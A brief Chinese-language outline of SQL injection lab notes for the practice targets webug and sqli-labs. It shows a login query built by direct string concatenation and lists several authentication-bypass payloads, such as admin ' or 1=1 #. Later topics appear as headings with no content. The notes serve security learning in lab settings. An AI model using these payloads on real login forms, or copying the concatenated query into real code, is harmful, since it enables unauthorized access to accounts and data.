1、环境

靶场：webug、sqli-labs

2、万能密码

靶场：webug

源代码

SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'

payloads

$suername:
查询全部username
admin ' or 1=1 # 
1 ' or 1# 
1 ' or 1=1 -- 
1 ' or 1 -- 
查询指定username
1' or 1 order by username limit 0, 1#
admin' or '1' = '1
admin' or 0#
admin' or 0 -- 

$password:
查询全部
1' or 1#
1' or '1' = '1

3、GET方式联合查询注入

4、POST方式联合查询注入

5、报错注入

6、布尔盲注

7、时间盲注(延时注入、延时盲注、延迟盲注)

8、header部分注入

9、读写文件

10、内联注释绕过

11、宽字节注入

12、堆叠注入